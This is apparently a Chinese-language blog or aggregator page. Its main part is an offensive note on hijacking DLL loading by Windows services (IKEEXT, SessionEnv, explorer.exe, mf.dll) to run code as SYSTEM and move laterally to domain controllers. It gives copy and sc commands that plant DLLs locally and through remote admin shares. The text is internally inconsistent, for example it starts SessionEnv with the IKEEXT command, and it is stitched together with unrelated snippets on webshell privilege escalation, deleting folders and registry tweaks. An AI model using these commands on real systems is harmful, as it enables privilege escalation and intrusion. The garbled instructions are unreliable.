查考文章
今天看了一篇文章,發現文章中的利用方法只能在win7上使用,無法在win10上使用,特做記錄。
實現效果:
得到後門執行並得到system許可權。
ikeext(ike and authip ipsec keying modules)服務在啟動時會載入wlbsctrl.dll,但windows系統預設配置下該dll不存在,如果我們將自己的dll放在這個位置,在服務啟動時就能載入該dll.
copy calc_x64.dll c:\windows\system32\wlbsctrl.dll
sc query ikeext
sc stop ikeext
sc start ikeext
遠端執行:
copy calc_x64.dll \\target\c$\windows\system32\wlbsctrl.dll
sc \\target query ikeext
sc \\target stop ikeext
sc \\target start ikeext
sessionenv(remote desktop configuration)服務在啟動時會載入c:\windows\system32\tsmsisrv.dll和c:\windows\system32\tsvipsrv.dll,但windows系統預設配置下這兩個dll不存在,如果我們將自己的dll放在這個位置,在服務啟動時就能載入該dll,啟動sessionenv服務方法為sc start ikeext。
利用命令:
copy calc_x64.dll c:\windows\system32\tsmsisrv.dll
sc query ikeext
sc stop ikeext
sc start ikeext
或者copy calc_x64.dll c:\windows\system32\tsvipsrv.dll
sc query ikeext
sc stop ikeext
sc start ikeext
遠端執行的用法:
copy calc_x64.dll \\target\c$\windows\system32\tsmsisrv.dll
sc \\target query ikeext
sc \\target stop ikeext
sc \\target start ikeext
或者copy calc_x64.dll \\target\c$\windows\system32\tsvipsrv.dll
sc \\target query ikeext
sc \\target stop ikeext
sc \\target start ikeext
如果系統開啟了遠端桌面的功能(支援遠端連線到此計算機),就會開啟sessionenv(remote desktop configuration)服務,如果我們在c:\windows\system32\下寫入tsmsisrv.dll或tsvipsrv.dll,就能在服務啟動時載入該dll,實現**執行。
應用場景:1.如果域控制器未開啟遠端桌面的功能,在系統啟動時劫持explorer.exe對fxsst.dll的載入獲得域控制器檔案的遠端訪問許可權,但無法遠端執行命令.
寫入檔案c:\windows\fxsst.dll
2.如果域控制器開啟了遠端桌面的功能,在系統啟動時將開啟sessionenv服務,載入tsmsisrv.dll或tsvipsrv.dll
寫入檔案c:\windows\system32\tsmsisrv.dll或c:\windows\system32\tsmsisrv.dll
3.如果域控制器開啟了遠端桌面的功能,在使用者進行遠端桌面連線時將會載入mf.dll
實際測試:
測試環境: server2012r2 x64
寫入檔案c:\windows\system32\mf.dll,命令如下:
《lateral movement — scm and dll hijacking primer》的利用擴充套件
2019 12 10 win7,win12提權練習
一 win7 1,上傳webshell到伺服器,訪問 2,因為win7許可權沒設定好,導致任何命令都可以執行 直接提權成功,還可以通過msf工具利用exp進行提權,今天太晚了就先不做了 二 win2012 1,將寫好的大馬放到web伺服器上 2,測試機進行訪問大馬,執行whoami執行成功,是iis...
如何用程式刪除win 7下SYSTEM許可權的目錄
win7系統由於安裝程式等操作,可能會在系統中留下一些所有許可權是system角色的目錄,例如我的系統以前在c盤的qq解除安裝後的遺留檔案 下圖 system是windows系統中最高許可權角色 組 比administrator使用者許可權高,這樣的目錄無法手工刪除。網上給的方法是右鍵點選資料夾 屬...
如何讓Win7不再彈出公升級Win10的提醒視窗
hkey local machine software policies microsoft windows gwxps 鑑於修改登錄檔有風險,所以建議修改前備份登錄檔,或者建立系統還原點,以便出現問題時恢復。在右側窗格中新建名為disablegwx的dword 32位 值,雙擊該值,把數值資料設定...